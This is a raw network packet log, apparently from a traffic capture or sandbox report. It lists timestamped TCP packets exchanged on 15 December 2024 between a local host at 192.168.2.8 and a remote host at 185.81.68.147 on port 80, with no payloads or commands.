                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.396708965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.396785975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.397435904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.397538900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.397614002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.398271084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.398370028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.398447990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.399112940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.399220943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.399295092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.400093079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.400105953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.400199890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.400794029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.400895119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.400970936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.401602030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.401701927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.401778936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.402436972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.402587891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.402662992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.403321028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.403419971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.403496027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.404071093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.417881012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.417892933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.418008089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.418045044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.418114901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.418154001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.418899059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.418962955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.418994904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.419811010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.419857025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.419868946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.420587063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.420648098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.420681953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.421422958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.421483994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.421516895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.422230959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.422291040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.422327995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.423096895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.423158884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.423203945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.423948050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.423993111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.424006939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.424758911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.424818039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.424870014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.477735043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.563834906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.563915014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.564073086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.564145088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.564352036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.564433098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.565011978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.565114021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.565192938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.565821886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.565942049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.566019058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.566694975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.566771984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.566849947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.567521095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.567611933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.567687988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.568416119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.568470955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.568545103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.569144011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.569247007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.569418907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.569988012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.570101023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.570183992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.570816994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.570923090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.571011066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.571721077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.571801901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.571897030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.572562933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.572582960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.572681904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.573340893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.573482990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.573566914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.574191093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.574290991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.574381113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.574985027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.575145960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.575227976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.575833082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.575952053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.576039076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.576683044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.576836109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.576919079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.577836037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.577908993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.577991009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.578455925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.578542948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.578627110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.579216957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.579310894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.579401970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.580002069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.580128908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.580212116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.580887079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.580971956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.581049919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.581655979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.581754923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.581835985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.582612038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.582688093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.582778931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.583375931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.583563089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.583645105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.584163904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.584290981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.584373951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.584980011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.585127115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.585217953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.586009026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.586159945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.586244106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.586930990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.587059975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.587131023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.587743044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.587924004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.588000059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.588417053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.588437080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.588510036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.589162111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.589271069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.589345932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.590001106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.590142012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.590218067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.590853930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.590974092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.591058016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.591701984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.591777086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.591852903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.592514992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.592607975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.592684031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.593313932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.593461037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.593533993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.594186068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.594332933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.594399929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.595038891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.595115900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.595185041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.595860004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.595961094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.596036911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.596666098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.596848965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.596925974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.597628117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.597748995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.597817898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.598332882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.598434925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.598510981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.599179029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.610095978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.610217094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.610356092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.610431910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.610497952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.610529900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.611251116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.611321926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.611357927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.612095118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.612163067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.612216949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.612930059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.612999916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.613034964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.613755941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.613821983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.613856077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.614623070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.614689112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.614783049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.615459919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.615528107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.615542889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.616254091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.616317987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.616352081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.617228031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.617280006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.617289066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.665172100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.756109953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.756129026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.756256104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.756292105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.756340981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.756385088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.757082939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.757179022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.757253885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.757904053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.758023977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.758094072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.758760929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.758869886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.758958101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.759557009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.759681940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.759754896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.760402918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.760510921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.760579109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.761221886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.761324883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.761396885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.762069941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.762183905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.762254000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.763134003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.763166904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.763251066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.763756037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.763854980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.763926983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.764575958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.764723063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.764796972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.765415907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.765500069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.765628099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.766242027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.766347885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.766421080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.767060041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.767177105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.767249107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.767919064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.768038034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.768110991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.768767118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.768876076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.768946886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.769582033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.769649029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.769720078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.770415068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.770576954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.770644903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.771239996 CET8049709185.81.68.147192.168.2.8
